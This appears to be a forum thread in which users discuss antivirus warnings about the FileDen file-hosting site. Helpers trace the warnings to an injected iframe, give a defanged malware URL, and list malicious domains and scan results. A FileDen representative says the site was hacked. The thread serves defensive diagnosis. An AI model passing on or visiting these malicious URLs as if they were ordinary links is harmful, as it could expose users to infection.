http://i146.photobucket.com/albums/r243/kitsune_baka/fileden_avast.png
I’ve been using FileDen to share files for years, but after my Avast updated it now says that FileDen has some kind of trojan… is this a false positive, or is it serious?
Report 2010-10-26 08:47:45 (GMT 1)
Website fileden.com
Domain Hash 88da1b00d86b8b2077c7287f276dd23b
IP Address 98.142.215.181 [SCAN]
IP Hostname w01.fileden.com
IP Country US (United States)
AS Number 14141
AS Name WIRESIX - WireSix, Inc.
Detections 3 / 17 (18 %)
Status DANGEROUS
Scanning site with: AMaDa DETECTED
http://amada.abuse.ch/?search=fileden.com
Scanning site with: hpHosts DETECTED
http://hosts-file.net/?s=fileden.com
Scanning site with: Malware Domain List DETECTED
http://www.malwaredomainlist.com/mdl.php?search=fileden.com
Hi,
the reason avast detects this site is this piece of javascript code on the bottom
http://img295.imageshack.us/img295/4333/fileden.png
Which in readable version is
http://img183.imageshack.us/img183/8800/fileden2.png
If you read it carefully, it is embedding iframe with malware url - hXXp://robingood.cz.cc/trafcontrol/go.php?sid=6
So probably this site has been hacked.
But because Avast “aborted connection,” nothing got in, right???
Yes, avast saved your day!
and there is many that dont like that website
VirusTotal - index.html - 12/43
http://www.virustotal.com/file-scan/report.html?id=4e8456c72903f55c0931b95a6e50477c922e70187b3f274acde7cb54291517ee-1288063172
Well… that sucks, FileDen was also how I hosted the mp3-files for the flash mp3 player on my Myspace. Guess I’ll hafta switch to something else now like maybe MediaFire. Kinda makes me wonder though, if it was like that before, or just recently… Avast had never said anything about the site in the past.
It is possible that the site has recently been hacked as avast has been very hot on detecting these things. So if you have had avast for some time and visiting the site without problem, then this is a relatively recent problem with the site.
Hello everyone,
I am a representative from File Den and would like to clarify the situation.
Firstly, we are not in any way attempting to distribute malware to our users - we were under attack from someone intent on injecting an iframe code into our website.
We have removed all traces of this malware and have been clean for a couple of days now. We are working hard to get to the bottom of this exploit, currently we have full file system locks in place for our servers stopping attackers from being able to write to any files whilst we get to the bottom of it.
We apologise for any inconvenience. Even the biggest websites are victims of similar attacks. Past examples include Tech Crunch, ZDNet and other large websites.
Best regards,
The File Den Team
Well I don’t know the current situation re your site, but this topic is almost 5 months old and reflects different circumstances as the avast alerts are real-time detections.
No avast alerts currently on the home page.
Sucuri sitescheck says: web site:
htxp://www.fileden.com
status:
Site verified to be secure and free of malware.
web trust:
Site not blacklisted.
Google Adsense installed: pub-6769203647673785
Links found:
FAQ.php
public.php
account.php?action=login
account.php?action=plan
account.php?action=password
aboutus.php
/image-hosting.php
personal.php
privacy_policy.php
But the site was found suspicious by Google Safebrowsing, and that was only yesterday:
Last time suspicious content was found on this site was on 2011-03-09.
Malicious software includes 216 scripting exploits, 69 trojans, 20 exploits. Successful infection resulted in an average of 1 new process on the target machine.
Malicious software is being hosted on 3 domains, e.g. sxp9.co.cc/, z3co.co.cc/, 194.28.113.0/.
This site was hosted on 1 network, including AS14141 (WIRESIX).
It seems this site has been functioned in spreading malware to infect further 35 sites, e.g. on2on2. blogspot.com/, insu. edu.sv/, bloggang. com/.
Found to be dangerous here:
http://www.urlvoid.com/scan/fileden.com
But Trend Micro sitesafety gives it as green,
Webutation gives it a meagre 40 points, see: http://www.urlvoid.com/scan/fileden.com
128 red downloads, 1 pop-up
Trojan.TDSS found: http://www.malwaredomainlist.com/mdl.php?search=fileden.com
Still detected by avast as: Win32:Alureon-SP also known as “CaM.BackDoor.Tdss.Win32.PEx.C.9834143283”.
see: http://www.virustotal.com/file-scan/report.html?id=04b5094db8523041f62ca3f75b99a3e5d57188d41dc091d8abeb0d464f39232d-1299787368
So safety score 0,0%, as in most cases the avast detection here is 100% malware…
polonus